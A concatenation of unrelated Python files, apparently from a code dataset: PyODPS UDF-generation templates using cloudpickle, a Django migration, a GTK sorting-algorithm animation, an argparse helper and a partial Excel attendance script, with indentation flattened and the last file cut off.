UDF_TMPL = '''
@annotate('%(from_type)s->%(to_type)s')
class %(func_cls_name)s(object):
def __init__(self):
unpickler_kw = dict(impl=%(implementation)s, dump_code=%(dump_code)s)
rs = loads(base64.b64decode('%(resources)s'), **unpickler_kw)
resources = []
for t, n, fields in rs:
if t == 'file':
resources.append(get_cache_file(str(n)))
elif t == 'archive':
resources.append(get_cache_archive(str(n)))
else:
tb = get_cache_table(str(n))
if fields:
tb = gen_resource_data(fields, tb)
resources.append(tb)
libraries = (l for l in '%(libraries)s'.split(',') if len(l) > 0)
files = []
for lib in libraries:
if lib.startswith('a:'):
lib = lib[2:]
f = get_cache_archive_data(lib)
else:
f = get_cache_file(lib)
files.append(read_lib(lib, f))
sys.meta_path.append(CompressImporter(*files, supersede=%(supersede_libraries)r))
load_np_generic()
encoded = '%(func_str)s'
f_str = base64.b64decode(encoded)
self.f = loads(f_str, **unpickler_kw)
if inspect.isclass(self.f):
if resources:
self.f = self.f(resources)
else:
self.f = self.f()
else:
if resources:
self.f = self.f(resources)
self.names = tuple(it for it in '%(names_str)s'.split(',') if it)
if self.names:
self.named_args = xnamedtuple('NamedArgs', self.names)
encoded_func_args = '%(func_args_str)s'
func_args_str = base64.b64decode(encoded_func_args)
self.args = loads(func_args_str, **unpickler_kw) or tuple()
encoded_func_kwargs = '%(func_kwargs_str)s'
func_kwargs_str = base64.b64decode(encoded_func_kwargs)
self.kwargs = loads(func_kwargs_str, **unpickler_kw) or dict()
self.from_types = '%(raw_from_type)s'.split(',')
self.to_type = '%(to_type)s'
def _handle_input(self, args):
from datetime import datetime
from decimal import Decimal
res = []
for t, arg in zip(self.from_types, args):
if PY2 and t == 'datetime' and arg is not None and not isinstance(arg, datetime):
res.append(datetime.fromtimestamp(arg / 1000.0))
elif t == 'decimal' and arg is not None and isinstance(arg, str):
res.append(Decimal(arg))
else:
res.append(arg)
return res
def _to_milliseconds(self, dt):
return int((time.mktime(dt.timetuple()) + dt.microsecond/1000000.0) * 1000)
def _handle_output(self, arg):
from datetime import datetime
from decimal import Decimal
t = self.to_type
if PY2 and t == 'datetime' and isinstance(arg, datetime):
if isinstance(arg, np_generic):
arg = arg.item()
return self._to_milliseconds(arg)
elif t == 'string' and isinstance(arg, Decimal):
return str(arg)
else:
if isinstance(arg, np_generic):
arg = arg.item()
return arg
def evaluate(self, %(input_args)s):
args = %(input_args)s,
args = self._handle_input(args)
if not self.names:
args = tuple(args) + tuple(self.args)
res = self.f(*args, **self.kwargs)
return self._handle_output(res)
else:
res = self.f(self.named_args(*args), *self.args, **self.kwargs)
return self._handle_output(res)
'''
UDTF_TMPL = '''
import functools
from odps.udf import BaseUDTF
if PY2:
string_type = unicode
byte_type = str
else:
string_type = str
byte_type = (bytes, bytearray)
@annotate('%(from_type)s->%(to_type)s')
class %(func_cls_name)s(BaseUDTF):
def __init__(self):
unpickler_kw = dict(impl=%(implementation)s, dump_code=%(dump_code)s)
rs = loads(base64.b64decode('%(resources)s'), **unpickler_kw)
resources = []
for t, n, fields in rs:
if t == 'file':
resources.append(get_cache_file(str(n)))
elif t == 'archive':
resources.append(get_cache_archive(str(n)))
else:
tb = get_cache_table(str(n))
if fields:
tb = gen_resource_data(fields, tb)
resources.append(tb)
libraries = (l for l in '%(libraries)s'.split(',') if len(l) > 0)
files = []
for lib in libraries:
if lib.startswith('a:'):
lib = lib[2:]
f = get_cache_archive_data(lib)
else:
f = get_cache_file(lib)
files.append(read_lib(lib, f))
sys.meta_path.append(CompressImporter(*files, supersede=%(supersede_libraries)r))
load_np_generic()
encoded = '%(func_str)s'
f_str = base64.b64decode(encoded)
self.f = loads(f_str, **unpickler_kw)
if inspect.isclass(self.f):
if not resources:
self.f = self.f()
else:
self.f = self.f(resources)
self.is_f_generator = inspect.isgeneratorfunction(self.f.__call__)
self.close_f = getattr(self.f, 'close', None)
self.is_close_f_generator = inspect.isgeneratorfunction(self.close_f)
else:
if resources:
self.f = self.f(resources)
if isinstance(self.f, functools.partial):
self.is_f_generator = inspect.isgeneratorfunction(self.f.func)
else:
self.is_f_generator = inspect.isgeneratorfunction(self.f)
self.close_f = None
self.is_close_f_generator = False
encoded_func_args = '%(func_args_str)s'
func_args_str = base64.b64decode(encoded_func_args)
self.args = loads(func_args_str, **unpickler_kw) or tuple()
encoded_func_kwargs = '%(func_kwargs_str)s'
func_kwargs_str = base64.b64decode(encoded_func_kwargs)
self.kwargs = loads(func_kwargs_str, **unpickler_kw) or dict()
self.names = tuple(it for it in '%(names_str)s'.split(',') if it)
if self.names:
self.name_args = xnamedtuple('NamedArgs', self.names)
self.from_types = '%(raw_from_type)s'.split(',')
self.to_types = '%(to_type)s'.split(',')
def _handle_input(self, args):
from datetime import datetime
from decimal import Decimal
res = []
for t, arg in zip(self.from_types, args):
if PY2 and t == 'datetime' and arg is not None and not isinstance(arg, datetime):
res.append(datetime.fromtimestamp(arg / 1000.0))
elif t == 'decimal' and arg is not None and not isinstance(arg, Decimal):
res.append(Decimal(arg))
else:
res.append(arg)
return res
def _to_milliseconds(self, dt):
return int((time.mktime(dt.timetuple()) + dt.microsecond/1000000.0) * 1000)
def _handle_output(self, args):
from datetime import datetime
from decimal import Decimal
if len(self.to_types) != len(args):
raise ValueError('Function output size should be ' + str(len(self.to_types))
+ ', got ' + str(args))
res = []
for t, arg in zip(self.to_types, args):
if PY2 and t == 'datetime' and isinstance(arg, datetime):
if isinstance(arg, np_generic):
arg = arg.item()
res.append(self._to_milliseconds(arg))
elif t == 'string' and isinstance(arg, Decimal):
res.append(str(arg))
elif PY2 and t == 'string' and isinstance(arg, string_type):
res.append(arg.encode('utf-8'))
elif PY3 and t == 'string' and isinstance(arg, byte_type):
res.append(arg.decode('utf-8'))
else:
if isinstance(arg, np_generic):
arg = arg.item()
res.append(arg)
return res
def process(self, %(input_args)s):
args = %(input_args)s,
args = self._handle_input(args)
if not self.names:
args = tuple(args) + tuple(self.args)
else:
args = (self.name_args(*args), ) + tuple(self.args)
if self.is_f_generator:
for r in self.f(*args, **self.kwargs):
if not isinstance(r, (list, tuple)):
r = (r, )
self.forward(*self._handle_output(r))
else:
res = self.f(*args, **self.kwargs)
if res:
if not isinstance(res, (list, tuple)):
res = (res, )
self.forward(*self._handle_output(res))
def close(self):
if not self.close_f:
return
if self.is_close_f_generator:
for r in self.close_f(*self.args, **self.kwargs):
if not isinstance(r, (list, tuple)):
r = (r, )
self.forward(*self._handle_output(r))
else:
res = self.close_f(*self.args, **self.kwargs)
if res:
if not isinstance(res, (list, tuple)):
res = (res, )
self.forward(*self._handle_output(res))
'''
UDAF_TMPL = '''
from odps.udf import BaseUDAF
@annotate('%(from_type)s->%(to_type)s')
class %(func_cls_name)s(BaseUDAF):
def __init__(self):
unpickler_kw = dict(impl=%(implementation)s, dump_code=%(dump_code)s)
rs = loads(base64.b64decode('%(resources)s'), **unpickler_kw)
resources = []
for t, n, fields in rs:
if t == 'file':
resources.append(get_cache_file(str(n)))
elif t == 'archive':
resources.append(get_cache_archive(str(n)))
else:
tb = get_cache_table(str(n))
if fields:
tb = gen_resource_data(fields, tb)
resources.append(tb)
libraries = (l for l in '%(libraries)s'.split(',') if len(l) > 0)
files = []
for lib in libraries:
if lib.startswith('a:'):
lib = lib[2:]
f = get_cache_archive_data(lib)
else:
f = get_cache_file(lib)
files.append(read_lib(lib, f))
sys.meta_path.append(CompressImporter(*files, supersede=%(supersede_libraries)r))
load_np_generic()
encoded_func_args = '%(func_args_str)s'
func_args_str = base64.b64decode(encoded_func_args)
args = loads(func_args_str, **unpickler_kw) or tuple()
encoded_func_kwargs = '%(func_kwargs_str)s'
func_kwargs_str = base64.b64decode(encoded_func_kwargs)
kwargs = loads(func_kwargs_str, **unpickler_kw) or dict()
encoded = '%(func_str)s'
f_str = base64.b64decode(encoded)
agg = loads(f_str, **unpickler_kw)
if resources:
if not args and not kwargs:
self.f = agg(resources)
else:
kwargs['resources'] = resources
self.f = agg(*args, **kwargs)
else:
self.f = agg(*args, **kwargs)
self.from_types = '%(raw_from_type)s'.split(',')
self.to_type = '%(to_type)s'
def _handle_input(self, args):
from datetime import datetime
from decimal import Decimal
res = []
for t, arg in zip(self.from_types, args):
if PY2 and t == 'datetime' and arg is not None and not isinstance(arg, datetime):
res.append(datetime.fromtimestamp(arg / 1000.0))
elif t == 'decimal' and arg is not None and not isinstance(arg, Decimal):
res.append(Decimal(arg))
else:
res.append(arg)
return res
def _to_milliseconds(self, dt):
return int((time.mktime(dt.timetuple()) + dt.microsecond/1000000.0) * 1000)
def _handle_output(self, arg):
from datetime import datetime
from decimal import Decimal
t = self.to_type
if PY2 and t == 'datetime' and isinstance(arg, datetime):
if isinstance(arg, np_generic):
arg = arg.item()
return self._to_milliseconds(arg)
elif t == 'string' and isinstance(arg, Decimal):
return str(arg)
else:
if isinstance(arg, np_generic):
arg = arg.item()
return arg
def new_buffer(self):
return self.f.buffer()
def iterate(self, buffer, %(input_args)s):
args = %(input_args)s,
args = self._handle_input(args)
self.f(buffer, *args)
def merge(self, buffer, pbuffer):
self.f.merge(buffer, pbuffer)
def terminate(self, buffer):
res = self.f.getvalue(buffer)
return self._handle_output(res)
'''
def _gen_map_udf(node, func_cls_name, libraries, func, resources,
func_to_udfs, func_to_resources, func_params):
names_str = ''
if isinstance(node, MappedExpr) and node._multiple and \
all(f.name is not None for f in node.inputs):
names_str = ','.join(f.name for f in node.inputs)
from_type = ','.join(df_type_to_odps_type(t).name for t in node.input_types)
to_type = df_type_to_odps_type(node.dtype).name
raw_from_type = ','.join(df_type_to_odps_type(t).name for t in node.raw_input_types)
func_args_str = to_str(
base64.b64encode(cloudpickle.dumps(node._func_args, dump_code=options.df.dump_udf)))
func_kwargs_str = to_str(
base64.b64encode(cloudpickle.dumps(node._func_kwargs, dump_code=options.df.dump_udf)))
if inspect.isfunction(func) and not func.__closure__:
func_sig = id(func.__code__)
else:
func_sig = func
key = (from_type, to_type, func_sig, tuple(resources), names_str, func_args_str, func_kwargs_str)
if key in func_params:
node.func = func_params[key]
return
else:
if func in func_to_udfs:
func = make_copy(func)
node.func = func
func_params[key] = func
func_to_udfs[func] = UDF_TMPL_HEADER + UDF_TMPL % {
'raw_from_type': raw_from_type,
'from_type': from_type,
'to_type': to_type,
'func_cls_name': func_cls_name,
'func_str': to_str(base64.b64encode(cloudpickle.dumps(func, dump_code=options.df.dump_udf))),
'func_args_str': func_args_str,
'func_kwargs_str': func_kwargs_str,
'names_str': names_str,
'resources': to_str(
base64.b64encode(cloudpickle.dumps([r[:3] for r in resources], dump_code=options.df.dump_udf))),
'implementation': CLIENT_IMPL,
'dump_code': options.df.dump_udf,
'input_args': ', '.join('arg{0}'.format(i) for i in range(len(node.input_types))),
'libraries': ','.join(libraries if libraries is not None else []),
'supersede_libraries': options.df.supersede_libraries,
}
if resources:
func_to_resources[func] = resources
def _gen_apply_udf(node, func_cls_name, libraries, func, resources,
func_to_udfs, func_to_resources, func_params):
names_str = ','.join(f.name for f in node.fields)
from_type = ','.join(df_type_to_odps_type(t).name for t in node.input_types)
raw_from_type = ','.join(df_type_to_odps_type(t).name for t in node.raw_input_types)
to_type = ','.join(df_type_to_odps_type(t).name for t in node.schema.types)
func_args_str = to_str(
base64.b64encode(cloudpickle.dumps(node._func_args, dump_code=options.df.dump_udf)))
func_kwargs_str = to_str(
base64.b64encode(cloudpickle.dumps(node._func_kwargs, dump_code=options.df.dump_udf)))
key = (from_type, to_type, func, tuple(resources), names_str, func_args_str, func_kwargs_str)
if key in func_params:
return
else:
if func in func_to_udfs:
func = make_copy(func)
node.func = func
func_params[key] = func
func_to_udfs[func] = UDF_TMPL_HEADER + UDTF_TMPL % {
'raw_from_type': raw_from_type,
'from_type': from_type,
'to_type': to_type,
'func_cls_name': func_cls_name,
'func_str': to_str(base64.b64encode(cloudpickle.dumps(func, dump_code=options.df.dump_udf))),
'func_args_str': func_args_str,
'func_kwargs_str': func_kwargs_str,
'close_func_str': to_str(
base64.b64encode(cloudpickle.dumps(getattr(node, '_close_func', None), dump_code=options.df.dump_udf))),
'names_str': names_str,
'resources': to_str(base64.b64encode(cloudpickle.dumps([r[:3] for r in resources]))),
'implementation': CLIENT_IMPL,
'dump_code': options.df.dump_udf,
'input_args': ', '.join('arg{0}'.format(i) for i in range(len(node.input_types))),
'libraries': ','.join(libraries if libraries is not None else []),
'supersede_libraries': options.df.supersede_libraries,
}
if resources:
func_to_resources[func] = resources
def _gen_agg_udf(node, func_cls_name, libraries, func, resources,
func_to_udfs, func_to_resources, func_params):
from_type = ','.join(df_type_to_odps_type(t).name for t in node.input_types)
raw_from_type = ','.join(df_type_to_odps_type(t).name for t in node.raw_input_types)
to_type = df_type_to_odps_type(node.dtype).name
func_args_str = to_str(
base64.b64encode(cloudpickle.dumps(node._func_args, dump_code=options.df.dump_udf)))
func_kwargs_str = to_str(
base64.b64encode(cloudpickle.dumps(node._func_kwargs, dump_code=options.df.dump_udf)))
key = (from_type, to_type, func, tuple(resources), func_args_str, func_kwargs_str)
if key in func_params:
return
else:
if func in func_to_udfs:
func = make_copy(func)
node.func = func
func_params[key] = func
func_to_udfs[func] = UDF_TMPL_HEADER + UDAF_TMPL % {
'raw_from_type': raw_from_type,
'from_type': from_type,
'to_type': to_type,
'func_cls_name': func_cls_name,
'func_str': to_str(base64.b64encode(cloudpickle.dumps(func, dump_code=options.df.dump_udf))),
'func_args_str': func_args_str,
'func_kwargs_str': func_kwargs_str,
'resources': to_str(
base64.b64encode(cloudpickle.dumps([r[:3] for r in resources], dump_code=options.df.dump_udf))),
'implementation': CLIENT_IMPL,
'dump_code': options.df.dump_udf,
'input_args': ', '.join('arg{0}'.format(i) for i in range(len(node.input_types))),
'libraries': ','.join(libraries if libraries is not None else []),
'supersede_libraries': options.df.supersede_libraries,
}
if resources:
func_to_resources[func] = resources
def gen_udf(expr, func_cls_name=None, libraries=None):
func_to_udfs = OrderedDict()
func_to_resources = OrderedDict()
func_params = dict()
if libraries is not None:
def _get_library_name(res):
if isinstance(res, six.string_types):
return res
elif isinstance(res, ArchiveResource):
return 'a:' + res.name
else:
return res.name
libraries = [_get_library_name(lib) for lib in libraries]
for node in expr.traverse(unique=True):
func = getattr(node, 'func', None)
if func is None:
continue
if isinstance(func, six.string_types):
continue
resources = []
collection_idx = 0
if hasattr(node, '_resources') and node._resources:
for res in node._resources:
if isinstance(res, ArchiveResource):
tp = 'archive'
name = res.name
fields = None
create = False
table_name = None
elif isinstance(res, FileResource):
tp = 'file'
name = res.name
fields = None
create = False
table_name = None
elif isinstance(res, TableResource):
tp = 'table'
name = res.name
fields = tuple(col.name for col in res.get_source_table().table_schema.simple_columns)
create = False
table_name = None
else:
res = node._collection_resources[collection_idx]
collection_idx += 1
tp = 'table'
name = 'tmp_pyodps_resource_%s' % (uuid.uuid4())
fields = tuple(res.schema.names)
create = True
table_name = get_executed_collection_project_table_name(res)
resources.append((tp, name, fields, create, table_name))
if isinstance(node, MappedExpr):
_gen_map_udf(node, func_cls_name, libraries, func, resources,
func_to_udfs, func_to_resources, func_params)
elif isinstance(node, RowAppliedCollectionExpr):
_gen_apply_udf(node, func_cls_name, libraries, func, resources,
func_to_udfs, func_to_resources, func_params)
elif isinstance(node, (Aggregation, GroupedAggregation)):
_gen_agg_udf(node, func_cls_name, libraries, func, resources,
func_to_udfs, func_to_resources, func_params)
return func_to_udfs, func_to_resources
|
998,316 | 258bf0913b27ae77a20bb23f2334050aceddd18d | # Generated by Django 3.1.2 on 2021-11-13 21:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('posts', '0006_vote_created_at'),
]
operations = [
migrations.AlterField(
model_name='vote',
name='post',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes', to='posts.post'),
),
]
|
998,317 | 330c3d14a1203ad040f4635e6212788edc14bd8b | from teacher import *
s=student()
s.set_details(124,"prasad","tirupati")
s1=s.get_details()
for x in s1:
print(x)
t=teacher()
t.set_student_details(125)
t1=t.get_student_details()
print(t1)
# for x in t1:
# print(x)
|
998,318 | 4cd259ea483b9d89c61b9185cc3b962b2ffcb869 | import argparse
class ArgumentsBase(object):
def __init__(self):
self.parser = argparse.ArgumentParser()
parser = self.parser
# gpu id
parser.add_argument('-gs', '--gpu-ids', type=int, nargs='+',
help='multiple gpu device ids to train the network')
# the data set
parser.add_argument('-b', '--batch-size', required=True, type=int, help='mini-batch size')
parser.add_argument('-nw', '--num-workers', default=4, type=int, help='workers for loading data')
# logfile info
parser.add_argument('-en', '--environment', type=str, default='main', help='log environment for visdom')
# model info
parser.add_argument('-model', '--model-name', type=str, required=True,
help='model name')
parser.add_argument('-nc', '--num_classes', type=int, default=1000, help='number of the classes')
def parse_args(self):
return self.parser.parse_args()
|
998,319 | 5de0089eaaec2efe7b76158aff51c394aa04e290 | #!/usr/bin/python3
#+
# glibcoro example: an animated display of a sorting algorithm.
# This script takes the following options:
#
# --algorithm=algorithm
# (required) specifies which sorting algorithm to demonstrate. Currently-valid
# values are "bubblesort", "quicksort" and "shellsort".
# --enddelay=t
# the number of seconds to delay before quitting after the algorithm completes,
# decimals allowed. If omitted, defaults to 5.0.
# --nrelements=n
# the number of elements in the array to be sorted. If omitted, defaults to 10.
# --ordered=f
# the fraction of elements to be initially ordered, decimals allowed, 0.0 to
# completely randomize their order, 1.0 to leave them completely ordered, -1.0 to
# have them in completely reverse order. If omitted, defaults to 0.0.
# --startdelay=t
# the number of seconds to delay before starting the sort,
# decimals allowed. If omitted, defaults to 3.0.
# --step=t
# the number of seconds to delay between element swaps, decimals allowed. If
# omitted, defaults to 1.0.
#
# Copyright 2009-2017 Lawrence D'Oliveiro <ldo@geek-central.gen.nz>.
# Licensed under CC-BY <http://creativecommons.org/licenses/by/4.0/>.
#-
import sys
import signal
import colorsys
import random
import asyncio
# docs: <https://pygobject.readthedocs.io/en/latest/>
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import \
Gtk
import glibcoro
import getopt
glibcoro.install()
loop = asyncio.get_event_loop()
#+
# Misc useful stuff
#-
class SortClass :
"abstract base class for sort algorithms."
def compare(self, a, b) :
# should return True iff the elements with the specified indices are already
# in the right order.
raise NotImplementedError("must be overridden")
#end compare
async def swap(self, a, b) :
# should exchange the elements with the specified indices.
raise NotImplementedError("must be overridden")
#end swap
async def sort(self) :
# should run the actual sort algorithm.
raise NotImplementedError("must be overridden")
#end sort
#end SortClass
def new_label() :
"returns a new Label widget which is meant to hold variable text," \
" initially filled in with something to force its width to a" \
" reasonable minimum."
return \
Gtk.Label("W" * 10)
#end new_label
#+
# Animation management
#-
def draw_background(da, ctx) :
drawable = da.get_parent_window()
_, _, width, height = drawable.get_geometry()
ctx.set_source_rgb(*colorsys.hsv_to_rgb(0.55, 0.25, 0.75))
ctx.rectangle(0, 0, width, height)
ctx.fill()
#end draw_background
class ItemWidget :
"manages rendition of an array sort element."
def __init__(self) :
self.display_widget = Gtk.DrawingArea()
self.display_widget.set_size_request(100, 8)
self.value = None
self.selected = False
self.display_widget.connect("draw", self.draw)
#end __init__
def draw(self, da, ctx) :
width = da.get_allocated_width()
height = da.get_allocated_height()
if self.selected :
ctx.set_source_rgb(*colorsys.hsv_to_rgb(0, 0.5, 0.75))
else :
ctx.set_source_rgb(*colorsys.hsv_to_rgb(0.18, 1, 0.85))
#end if
ctx.rectangle(0, 0, round(width * self.value / nr_sort_items), height)
ctx.fill()
#end draw
def set_value(self, new_value) :
if new_value != self.value :
self.value = new_value
self.display_widget.queue_draw()
#end if
#end set_value
def set_selected(self, new_selected) :
if new_selected != self.selected :
self.selected = new_selected != False
self.display_widget.queue_draw()
#end if
#end set_selected
#end ItemWidget
def recompute_ordered() :
"sets ordered_label to show a number indicating how well-ordered the sort" \
" elements are: 1.0 for completely in order, -1.0 for completely the wrong order," \
" or something correspondingly in-between."
# fixme: this interpretation of “ordered” parameter tends to be too
# close to zero compared with shuffle performed according to
# “--ordered” setting. Latter make sense (value of 0 gives good random
# order), this one needs fixing.
ordered = 0
for i in range(0, nr_sort_items - 1) :
if the_sort_items[i] <= the_sort_items[i + 1] :
ordered += 1
else :
ordered -= 1
#end if
#end for
ordered_label.set_text("Ordered: %.2f" % (ordered / (nr_sort_items - 1)))
#end recompute_ordered
class AnimSortClass(SortClass) :
"provides animated compare and swap callbacks for sort algorithms."
def compare(self, a, b) :
global nr_compares
if verbose :
sys.stderr.write("compare %d(%d) <=> %d(%d)\n" % (a, the_sort_items[a], b, the_sort_items[b]))
#end if
nr_compares += 1
compare_count_label.set_text("Compares: %d" % nr_compares)
return the_sort_items[a] <= the_sort_items[b]
#end compare
async def swap(self, a, b) :
global nr_swaps
if verbose :
sys.stderr.write("swap %d(%d) <=> %d(%d)\n" % (a, the_sort_items[a], b, the_sort_items[b]))
#end if
nr_swaps += 1
swap_count_label.set_text("Swaps: %d" % nr_swaps)
the_sort_items[b], the_sort_items[a] = the_sort_items[a], the_sort_items[b]
the_sort_display[a].set_selected(True)
the_sort_display[b].set_selected(True)
await asyncio.sleep(sort_step_interval / 2) # give user time to see change
the_sort_display[a].set_value(the_sort_items[a])
the_sort_display[b].set_value(the_sort_items[b])
recompute_ordered()
await asyncio.sleep(sort_step_interval / 2) # give user time to see change
the_sort_display[a].set_selected(False)
the_sort_display[b].set_selected(False)
#end swap
#end AnimSortClass
#+
# The sorting algorithms
#-
class Bubblesort(AnimSortClass) :
async def sort(self) :
if verbose :
sys.stderr.write("start sort\n")
#end if
for i in range(0, nr_sort_items) :
for j in range(i + 1, nr_sort_items) :
if not self.compare(i, j) :
await self.swap(i, j)
#end if
#end for
#end for
#end sort
#end Bubblesort
class Quicksort(AnimSortClass) :
async def partition(self, low, high) :
if verbose :
sys.stderr.write("partition [%d .. %d]\n" % (low, high))
#end if
pivot = low
swap_low = low
swap_high = high
# partitioning-in-place algorithm copied from <http://www.cs.auckland.ac.nz/software/AlgAnim/qsort1a.html>
while swap_low < swap_high :
while swap_low <= high and self.compare(swap_low, pivot) :
await self.swap(swap_low, pivot)
# yes I know, keeping the pivot element in the array, instead
# of taking it out and putting it back at the end, will lead
# to increased swap operations.
pivot = swap_low
swap_low += 1
#end while
while swap_high > low and not self.compare(swap_high, pivot) :
swap_high -= 1
#end while
if swap_low < swap_high and swap_low <= high :
await self.swap(swap_low, swap_high)
if pivot == swap_low :
pivot = swap_high
elif pivot == swap_high :
pivot = swap_low
#end if
#end if
#end while
if pivot > low :
await self.partition(low, pivot)
#end if
if pivot + 1 < high :
await self.partition(pivot + 1, high)
#end if
if verbose :
sys.stderr.write("done partition [%d .. %d]\n" % (low, high))
#end if
#end partition
async def sort(self) :
await self.partition(0, nr_sort_items - 1)
#end sort
#end Quicksort
class Shellsort(AnimSortClass) :
async def sort(self) :
m = 1
while m < nr_sort_items :
m += m
#end while
m = \
(
(m - 1)
# to ensure that successive increments are relatively prime,
# as per Knuth vol 3 page 91
>>
1
)
if m == 0 and nr_sort_items > 1 :
# do at least one pass when sorting 2 elements
m = 1
#end if
while m > 0 :
k = nr_sort_items - m
for j in range(0, k) :
i = j
while True :
l = i + m
if self.compare(i, l) :
break
await self.swap(i, l)
if i < m :
break
i -= m
#end while
#end for
m >>= 1
#end while
#end sort
#end Shellsort
sorting_algorithms = \
{
"bubblesort" : Bubblesort,
"quicksort" : Quicksort,
"shellsort" : Shellsort,
}
#+
# Globals
#-
# default params:
nr_sort_items = 10
sort_step_interval = 1.0 # seconds
start_delay = 3.0 # seconds
end_delay = 5.0 # seconds
#+
# GUI callbacks
#-
def stop(_) :
"installed as callback, e.g. when main window's close box is clicked," \
" to stop program."
loop.stop()
#end stop
async def sort_task() :
await asyncio.sleep(start_delay)
sorter = algorithm()
await sorter.sort()
await asyncio.sleep(end_delay)
loop.stop()
#end sort_task
#+
# Mainline
#-
opts, args = getopt.getopt \
(
sys.argv[1:],
"",
["algorithm=", "enddelay=", "nrelements=", "ordered=", "startdelay=", "step=", "verbose"]
)
if len(args) != 0 :
raise getopt.GetoptError("no arguments expected")
#end if
algorithm = None
ordered = 0.0
verbose = False
for keyword, value in opts :
if keyword == "--algorithm" :
algorithm_name = value
if algorithm_name not in sorting_algorithms :
raise getopt.GetoptError \
(
"unrecognized sorting algorithm \"%(name)s\", must be one of %(list)s"
%
{
"name" : algorithm_name,
"list" : ", ".join(sorted(sorting_algorithms.keys()))
}
)
#end if
algorithm = sorting_algorithms[algorithm_name]
elif keyword == "--enddelay" :
end_delay = float(value)
if end_delay < 0 :
raise getopt.GetoptError("--enddelay must not be negative")
#end if
elif keyword == "--nrelements" :
nr_sort_items = int(value)
if nr_sort_items <= 0 :
raise getopt.GetoptError("--nrelements must be greater than zero")
#end if
elif keyword == "--ordered" :
ordered = float(value)
if ordered < -1 or ordered > 1 :
raise getopt.GetoptError("--ordered must be in [-1 .. 1]")
#end if
elif keyword == "--startdelay" :
start_delay = float(value)
if start_delay < 0 :
raise getopt.GetoptError("--startdelay must not be negative")
#end if
elif keyword == "--step" :
sort_step_interval = float(value)
if sort_step_interval < 0 :
raise getopt.GetoptError("--step must not be negative")
#end if
elif keyword == "--verbose" :
verbose = True
#end if
#end for
if algorithm == None :
raise getopt.GetoptError("no --algorithm specified")
#end if
the_sort_items = list(range(1, nr_sort_items + 1))
if ordered < 0 :
the_sort_items = list(reversed(the_sort_items))
ordered = - ordered
#end if
for i in range(nr_sort_items - 1, 0, -1) :
if random.random() >= ordered :
j = int(random.random() * (i + 1))
the_sort_items[i], the_sort_items[j] = the_sort_items[j], the_sort_items[i]
#end if
#end for
main_window = Gtk.Window()
main_window.connect("destroy", stop)
main_window.set_border_width(10)
main_grid = Gtk.Grid()
main_grid.set_column_homogeneous(True)
main_grid.set_row_spacing(8)
algo_name_label = Gtk.Label(algorithm_name)
main_grid.attach(algo_name_label, 0, 0, 1, 1)
items_box = Gtk.Grid()
items_box.set_column_homogeneous(True)
items_box.set_row_spacing(8)
items_box.connect("draw", draw_background)
main_grid.attach_next_to(items_box, algo_name_label, Gtk.PositionType.BOTTOM, 1, 1)
the_sort_display = []
prev_widget = None
for i in range(0, len(the_sort_items)) :
the_widget = ItemWidget()
if prev_widget != None :
items_box.attach_next_to(the_widget.display_widget, prev_widget.display_widget, Gtk.PositionType.BOTTOM, 1, 1)
else :
items_box.attach(the_widget.display_widget, 0, 0, 1, 1)
#end if
prev_widget = the_widget
the_widget.set_value(the_sort_items[i])
the_sort_display.append(the_widget)
#end for
labels_box = Gtk.Grid()
labels_box.set_property("column-spacing", 8)
ordered_label = new_label()
compare_count_label = new_label()
swap_count_label = new_label()
labels_box.attach(ordered_label, 0, 0, 1, 1)
labels_box.attach_next_to(compare_count_label, ordered_label, Gtk.PositionType.RIGHT, 1, 1)
labels_box.attach_next_to(swap_count_label, compare_count_label, Gtk.PositionType.RIGHT, 1, 1)
main_grid.attach_next_to(labels_box, items_box, Gtk.PositionType.BOTTOM, 1, 1)
nr_compares = 0
nr_swaps = 0
main_window.add(main_grid)
main_window.show_all()
ordered_label.set_text("")
compare_count_label.set_text("")
swap_count_label.set_text("")
recompute_ordered()
main_window.show()
main_task = loop.create_task(sort_task()) # keep a reference while it runs
#loop.add_signal_handler(signal.SIGINT, stop, None)
# unnecessary to allow interruption with CTRL/C
loop.run_forever()
|
998,320 | 1c95cf1883c38ae7669ac2c2c6ba7a35933c9aab | import xlrd
import xlwt
print('xlwt',xlwt.__VERSION__)
def write_excel(data):
wb = xlwt.Workbook(encoding='utf-8',style_compression=0)
ws = wb.add_sheet('考勤统计',cell_overwrite_ok=True)
for row,rowItem in enumerate(data):
print(data)
for col,colItem in enumerate(rowItem):
ws.write(row, col, colItem)
wb.save('result/result.xls')
def read_excel():
# 打开文件
workBook = xlrd.open_workbook('data/total.xls');
# 1.获取sheet的名字
# 1.1 获取所有sheet的名字(list类型)
allSheetNames = workBook.sheet_names();
# 1.2 按索引号获取sheet的名字(string类型)
sheet1Name = workBook.sheet_names()[0];
# 2. 获取sheet内容
## 2.1 法1:按索引号获取sheet内容
sheet1_content1 = workBook.sheet_by_index(0); # sheet索引从0开始
## 2.2 法2:按sheet名字获取sheet内容
sheet1_content2 = workBook.sheet_by_name('Sheet1');
# 3. sheet的名称,行数,列数
print('originData',sheet1_content1.ncols,sheet1_content1.nrows)
result =[]
row = 1
while (row < sheet1_content1.nrows):
count = 1
user = []
work=[]
rest = []
headStr = ''
headStr = sheet1_content1.cell_value(row,0)
while (count < sheet1_content1.ncols):
timeArr = []
timeArr.append(sheet1_content1.col_values(count,0,1)[0])
timeArr.append(sheet1_content1.cell_value(row,count))
# timeArr = sheet1_content1.col_values(count)
if count% 2 == 0:
time = timeArr[0].split('-')
work.append([int(time[0]),timeArr[1]])
else:
time = timeArr[0].split('-')
rest.append([int(time[0]),timeArr[1]])
count = count+1
useSleep =[]
key = 0
print(work,rest)
for child in work:
# print(key,useSleep,child,rest[key])
resTime = rest[key][1]
if len(useSleep) < 3:
useSleep.append(child[1])
start = 0
while (resTime!=0):
if useSleep[start] < resTime:
resTime = resTime - useSleep[start]
useSleep[start] = 0
else:
useSleep[start] = useSleep[start] - resTime
start = start +1
if start==len(useSleep):
resTime = 0
elif len(useSleep) >=3 :
start = 0
while (start != len(useSleep)):
if useSleep[start] < resTime:
resTime = resTime - useSleep[start]
useSleep[start] = 0
else:
useSleep[start] = useSleep[start] - resTime
resTime=0
start = start +1
useSleep = useSleep[1:]
useSleep.append(child[1])
if useSleep[2] < resTime:
if key == len(rest) -1 :
useSleep[2] = useSleep[2] - resTime
resTime = 0
else:
resTime = resTime - useSleep[2]
useSleep[2] = 0
else:
useSleep[2] = useSleep[2] - resTime
key =key +1
print(useSleep)
useSleep.insert(0,headStr)
